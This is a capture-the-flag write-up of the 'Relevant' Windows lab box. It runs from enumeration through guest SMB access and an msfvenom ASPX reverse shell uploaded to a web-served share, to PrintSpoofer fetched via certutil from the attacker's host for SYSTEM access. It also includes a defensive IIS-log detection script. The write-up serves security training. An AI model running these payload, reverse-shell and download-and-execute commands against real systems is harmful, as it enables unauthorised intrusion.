Relevant is a medium-difficulty challenge that sticks to the basics and reminds the attacker that focusing on their methodology will get results. This challenge is great practice for both OSCP and eCPPT. The skills it exercises are worth perfecting and are important to practise for further certifications.
In saying that, the write-up below is a guide to tackling the challenge in a methodical way.
Relevant Write up
Back to basics and more!
Target Network Report
Name of Target:
# NMAP SCAN
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 125 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49663/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
The first port to tackle will usually be the web service on port 80. The information gathered from it is normally vital to understanding the target and the likely attack vectors.
Unfortunately, in this case the web service displays the default Microsoft IIS page, which indicates the site is incomplete. Running a directory scanner is important in these scenarios, as there may be hidden files or directories to uncover.
-n : No recursion
-w $FILE : Wordlist
-u $RHOST : Victim
feroxbuster -n -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://10.10.243.48
After running Feroxbuster, no results were returned, meaning this port is likely a dead end for now.
Ports 135, 139 and 445 are all related to SMB and its supporting services. SMB is quick to enumerate and allows quick wins if there are misconfigurations. The preferred method is to enumerate and understand what information can be obtained from the open port. In this instance, CrackMapExec is the perfect tool, and the following are the normal checks, in order:
crackmapexec smb $RHOST -u '' -p '' :Test for null shares
crackmapexec smb $RHOST -u 'administrator' -p '' :Test for administrator null password
crackmapexec smb $RHOST -u 'guest' -p '' :Test for guest null password
In this instance, the above shows that 'guest' has a null password, so there is access available there (note that the plus sign is CrackMapExec's way of visually showing success). This tool is also great for a quick check on whether SMB signing is enabled or disabled. Signing matters for NTLM relay attacks and should be kept in the back of the mind for later. It may not be useful in this challenge, since there is a single target and no additional hosts communicating with it, but it is important to note regardless.
Moving along, CME can enumerate shares, and doing so uncovers READ,WRITE access for the "Guest" account:
cme smb $RHOST -u 'guest' -p '' --shares
With CME confirming the shares visible to guest, the next logical step is to log in and search around. In doing so, a passwords.txt is uncovered:
smbclient //$RHOST/$SHAREfolder -U "guest"
The passwords.txt file contained credentials encoded in base64:
echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d
#Bob - !P@$$W0rD!123
echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
#Bill - Juw4nnaM4n420696969!$$$
These credentials should be noted for later use. They may also be a trap placed as a distraction, which is worth keeping in mind. Attempting to use them on port 3389 (Remote Desktop) fails, which shows the credentials are not important right now.
After hitting this roadblock and being blinded by credentials, it is important to 'reset' and review the scan information already available. In this instance, many people do not run a full port scan and would likely miss the higher, uncommon ports.
The focus now shifts to the higher port numbers that were found. Port 49663 shows up as an HTTP service, so it makes sense to have a look. It also returns a Microsoft IIS default page; however, since this service runs on a different port, sticking to the methodology and doing a directory bust is the best next step.
Running feroxbuster this time discovers the directory /nt4wrksv, the same name as the SMB share. The page loads with a 200 code but displays nothing. Given that it has the same name as the SMB share, testing can start with the files found there.
Test to see if files are accessible such as "passwords.txt"
Recalling that the user "guest" has READ/WRITE privileges on this share is important, as the likely next step is to abuse the ability to request an uploaded file through the web service. After confirming that an upload to the share is served by the web service, it is time to exploit the service with a payload. The service is Microsoft IIS, which normally executes .asp and .aspx files rather than .php.
It is important to tailor the payload to this fact:
- Likely Windows Server 2016, and the architecture is likely x64
- The IIS server accepts .asp or .aspx files; .php is unlikely to work
msfvenom -p windows/x64/shell_reverse_tcp lhost=$LHOST lport=$LPORT -f aspx -o shell.aspx
#SMB - Upload
smbclient //$RHOST/nt4wrksv -U 'guest'
nc -lvnp 4444
curl http://$RHOST:49663/nt4wrksv/shell.aspx :or just visit the webpage 10.10.6.134:49663/nt4wrksv/shell.aspx
With the successful reverse shell, we are the service account defaultapppool (Microsoft IIS) with low privileges. It is possible to obtain the user flag at this point.
Moving forward, it is important to enumerate further misconfigurations. Running the command will display the groups the user is a member of, as well as its privileges:
From this it is important to understand that several of the listed privileges can be abused; however, SeImpersonatePrivilege is often a golden goose in terms of privilege escalation vectors. There is a variety of ways it can be exploited:
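From the defender's side, the misconfiguration that made this shell possible is an SMB share writable by Guest that IIS serves as a virtual directory, so any server-side script dropped on the share is executed by the web server. The following is an added example, not code from the original write-up, that scans IIS W3C log lines for requests to script files under share-backed paths; the path list, extension list and log lines are constructed assumptions for the example.

```python
"""Flag requests for server-side scripts inside share-backed IIS directories.

Added example, not part of the original write-up. It assumes /nt4wrksv/ is
the IIS virtual directory that maps to the Guest-writable SMB share, and
uses constructed IIS W3C log lines as sample input.
"""

# Assumption: virtual directories that are backed by writable SMB shares.
SHARE_BACKED_PATHS = ("/nt4wrksv/",)
# Extensions IIS hands to a script handler rather than serving as static content.
SCRIPT_EXTENSIONS = (".asp", ".aspx", ".ashx", ".asmx")

# Constructed IIS W3C log excerpt (not real log data).
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2020-07-25 10:01:02 10.10.243.48 GET /nt4wrksv/ - 49663 10.9.1.5 200
2020-07-25 10:01:09 10.10.243.48 GET /nt4wrksv/passwords.txt - 49663 10.9.1.5 200
2020-07-25 10:02:31 10.10.243.48 GET /nt4wrksv/shell.aspx - 49663 10.9.1.5 200
2020-07-25 10:02:33 10.10.243.48 GET /iisstart.htm - 80 10.9.1.5 200
2020-07-25 10:02:40 10.10.243.48 GET /nt4wrksv/shell.aspx - 49663 10.9.1.5 200
"""


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue  # other directives (#Software, #Date, ...) and blank lines
        if fields is None:
            raise ValueError("W3C log has request lines before a #Fields header")
        yield dict(zip(fields, line.split()))


def find_script_requests(text):
    """Return {(client_ip, uri): info} for script files requested under share-backed paths."""
    alerts = {}
    for rec in parse_w3c(text):
        uri = rec["cs-uri-stem"].lower()
        if not uri.startswith(SHARE_BACKED_PATHS) or not uri.endswith(SCRIPT_EXTENSIONS):
            continue
        key = (rec["c-ip"], uri)
        if key not in alerts:  # keep the first sighting, count repeats
            alerts[key] = {"first_seen": f"{rec['date']} {rec['time']}",
                           "port": rec["s-port"], "status": rec["sc-status"], "hits": 0}
        alerts[key]["hits"] += 1
    return alerts
```

Requests for passwords.txt are not flagged (static content), while the first request for shell.aspx under /nt4wrksv/ is, with a hit count for repeat requests.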
- Metasploit has the "Incognito" module: if the shell obtained is a meterpreter session, it becomes trivial to load "Incognito" and impersonate the token of a higher-privileged account.
- Potato attacks do the same thing with impersonation, but these attacks normally rely on DCOM being enabled, and this particular target has it disabled.
- Finally, after searching, we find PrintSpoofer, which takes advantage of the SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege tokens.
If interested, have a read of the following to understand what is happening behind the scenes: READ
Compiling this tool is straightforward, and the next step is to upload it and run it. The tool immediately gave an NT AUTHORITY\SYSTEM shell with the highest privileges.
git clone https://github.com/dievus/printspoofer.git
python -m SimpleHTTPServer 80
#TRANSFER, Run from victim machine
certutil -urlcache -f http://$LHOST/printspoofer.exe printspoofer.exe
.\printspoofer.exe -i -c cmd
The tool is a great asset for token impersonation and made it trivially easy to escalate privileges. The difficulty lies in finding out during the enumeration phase that DCOM is disabled; missing that can cause headaches when potato attacks are attempted without understanding why they are not working.
Overall, this challenge featured a trap to disrupt the attacker's rhythm and methodology, and directory busting on both port 80 and port 49663 served as a reminder to always stick with the plan and revert to basics when stuck. Finally, token impersonation again served as a reminder to stick with the basics: find out what system is being dealt with and, once exploited, find out what the exploited user can do.
And finally, if you enjoyed the content and want to see more; feel free to feed the addiction. 👌